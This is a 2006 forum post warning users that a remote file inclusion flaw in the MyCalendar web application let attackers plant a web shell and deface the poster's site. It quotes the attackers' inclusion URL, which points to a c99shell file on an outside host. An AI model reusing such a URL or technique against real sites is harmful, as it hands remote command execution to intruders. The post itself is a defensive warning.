Joined: 19 Apr 2006
|Posted: Wed Apr 19, 2006 1:35 am Post subject: Hacker Exploit/Security Vulnerability in MyCalendar
I have been using MyCalendar for about a year now, and have had to remove it after a hacker group defaced one of my websites by exploiting a remote file inclusion vulnerability in MyCalendar to grant the attackers a web shell, allowing them to execute commands remotely.
Fortunately for me, these hackers just wanted to deface the home page and other points of entry, but they left all other files and data intact, and after I overwrote the pages they defaced with the originals I had backed up, all was well.
However, after consulting my webhost, we had to delete the MyCalendar program from the site and look for a more secure replacement. The Linux Administrator for my web host was able to find several other vulnerabilities with MyCalendar in just a matter of minutes.
They used this... http://svt.nukleon.us/tools/c99shell.txt?&cmd=u
If you go to that page you'll find the tool/code used to screw everything up on my site. Don't worry, it's just text/code on a page if you want to look at it.
Another thing to note, they could not delete files on my account, they were only able to rename the index.html and index.php files then insert index.htm files or recode the index.php files they wanted to deface.
Thought you and others might want to know about this before they install MyCalendar on their site, or if they already have the program they might want to try removing anything that says MyCalendar or any linsk to this site so that these hacker can't find their sites in web searches then deface them.